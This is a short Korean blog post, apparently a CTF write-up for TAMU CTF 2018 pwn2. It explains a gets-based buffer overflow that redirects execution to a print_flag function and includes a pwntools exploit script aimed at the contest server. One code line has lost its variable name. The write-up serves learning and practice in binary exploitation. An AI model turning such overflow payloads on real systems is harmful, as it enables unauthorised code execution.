티스토리 뷰

Pwnable/write up

[TAMU ctf 2018] pwn2

xxvd 2018. 5. 17. 01:03




             main에서 echo함수 불러오고


              


            gets 로 받으니깐 overflow 나겠네요


그리고 여기에도 마찬가지로 print_flag 함수가 있습니다! 그렇다면 overflow 시킨 다음 print_flag를 실행하게 하면 되겠네요



print_flag 주소를 구하고 익스 하겠습니다



이렇게도 풀 수 있고



이렇게 익스 코드 짜서 풀 수도 있네요!


1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
 
= remote("pwn.ctf.tamu.edu",4322)
 
payload=""
payload+="\x90"*243
payload+=p32(0x804854b#print_flag()'s addr
 
sleep(0.5)
 
s.sendline(payload)
 
print s.recv()
cs


'Pwnable > write up' 카테고리의 다른 글

[Defcon 2016]feedme  (0) 2018.08.27
[TAMU ctf 2018] pwn4  (0) 2018.05.17
[TAMU ctf 2018] pwn3  (0) 2018.05.17
[TAMU ctf 2018] pwn1  (0) 2018.05.17
[Codegate 2017] babypwn  (0) 2018.03.09
댓글
공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today
Yesterday
TAG
more
«   2025/05   »
1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
글 보관함